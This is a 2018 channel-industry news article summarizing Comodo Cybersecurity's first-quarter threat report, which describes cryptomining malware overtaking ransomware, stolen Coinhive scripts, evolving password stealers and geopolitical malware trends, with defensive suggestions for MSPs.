Comodo: Ransomware Declines, But Cryptomining Takes Off

Cryptomining has surged to the top of detected malware incidents, displacing ransomware, according to a new study.

April 27, 2018

4 Min Read

By Frank J. Ohlhorst

Cryptomining has surged to the top of detected malware incidents, displacing ransomware, according to a new study.

Comodo Cybersecurity’s new report is one of the first offered that fully analyzes data from the first quarter of the year. The company’s threat analysis shows a very different picture from 2017, indicating that MSPs might have to take on a new track to combat evolving threats.

The report reveals that protections against ransomware are beginning to work and cybercriminals are seeking other ways to profit from nefarious activities. MSPs looking to combat evolving threats will need to heed the shift in the attack vectors now becoming prevalent.


Comodo’s Kenneth Geers

“Malware, like cyberspace itself, is merely a reflection of traditional, real-world human affairs, and malware is always written for a purpose, whether it’s crime, espionage, terrorism or war,” said Kenneth Geers, chief research scientist at Comodo Cybersecurity. “Criminals’ proclivities to steal money more efficiently were evident with the surge in cryptomining. And the continued strong correlation of attack volume with current geopolitical events shows hackers of all motivations are well aware of the opportunities major breaking news provides them.”

Cryptominer attacks, which use malware to hijack users’ computers to mine cryptocurrencies, are becoming prevalent and have remained off most MSPs’ radar, since the malware is hidden, and for the most part, undetectable by PC’s operator. Therein lies the real danger: Cryptominer attacks secretly steal CPU cycles, while also co-opting the infected PC into a criminal enterprise.

By eliminating cryptominer malware, MSPs can better protect their customers and restore lost performance, while also demonstrating that they have to ability to fully protect a customers assets from evolving attacks.

During the first quarter of 2018, Comodo Cybersecurity detected nearly 29 million cryptominer incidents out of a total of 300 million malware incidents, amounting to a 10 percent share. The number of unique cryptominer variants grew from 93,750 in January to 127,000 in March. At the same time, the data shows this criminal attention came at the expense of ransomware activity, with new variants falling from 124,320 in January to 71,540 in March, a 42 percent decrease.

Other highlights of the Comodo Cybersecurity report for the last quarter include:

(list on next page)

  • Hackers subverted Coinhive, Crypto-Loot and other cryptocurrency mining services:  These legitimate companies offer website owners a way to monetize their sites by allowing customers to willingly let their computers be used for mining. The very short JavaScript that enabled the opt-in service, however, was quickly stolen by cybercriminals and used for malicious purposes. Widely and illegitimately spread worldwide by embedding the code into websites, Chrome extensions, typosquatted domains and malvertising, the hackers’ script stealthily uses system resources without the user’s permission to make money by mining cryptocurrencies.

  • Password stealers became more sophisticated and dangerous: Comodo Cybersecurity observed cybercriminals increasingly develop and update malware with the goal of stealing users’ credentials. Comodo Cybersecurity Threat Research Lab analyzed new variants of Pony Stealer, one of the most dangerous password stealers, which now demonstrates new capabilities in both stealing data and in covering its tracks.

  • Expect a ransomware resurgence: Ransomware attacks led the malware market in previous quarters, but showed a radical decrease in the number of overall detections, likely due to the shift to the low-hanging fruit of cryptominers. Ransomware’s overall share of incidents dropped from 42 percent in August to just 9 percent in February. Comodo Cybersecurity Labs caution to prepare for new ransomware attacks in a changed guise, perhaps morphing into a weapon of data destruction – as seen with NotPetya – rather than a tool to extort a ransom.

  • Geopolitical malware detections correlate with current events around the world: In the first quarter, Comodo Cybersecurity analysis yielded potential geopolitical correlations related to national elections in China and Russia. The company discovered correlations in Egypt, India, Iran, Israel, Turkey and Ukraine relative to military operations, along with other trends across Europe, Asia and Africa.

  • Hot zones identified by malware type: Countries that currently have the most acute challenges associated with Trojans, viruses and worms include Brazil, Egypt, India, Indonesia, Iran, Mexico, Nigeria, Philippines, Russia and South Africa. Countries in a higher socioeconomic category – that can afford more professional cyberdefenses – are often plagued by a higher ratio of application malware. Finally, countries that possess unusual malware profiles, such as Belarus, China, Israel, Japan, Kazakhstan, Turkey, the U.K. and Ukraine, are profiled in this report.

With those reported revelations in mind, MSPs can better target security service offerings to bring new levels of protection to their clients. A strategy of protection can readily be built around malware detection and remediation, along with enhanced password protection schemes (such as multifactor-authentication solutions), while advanced edge filtering can be used to minimize the impact of location based threats.

Simply put, the data presented in the report highlights the importance of trust for IT operations today; in other words, organizations have to establish the best tools to ensure that they trust their applications, connections, users and workflows. That cornucopia of trust may be one of the most powerful offerings that an MSP can bring to bear.

Read more about:

Free Newsletters for the Channel
Register for Your Free Newsletter Now

You May Also Like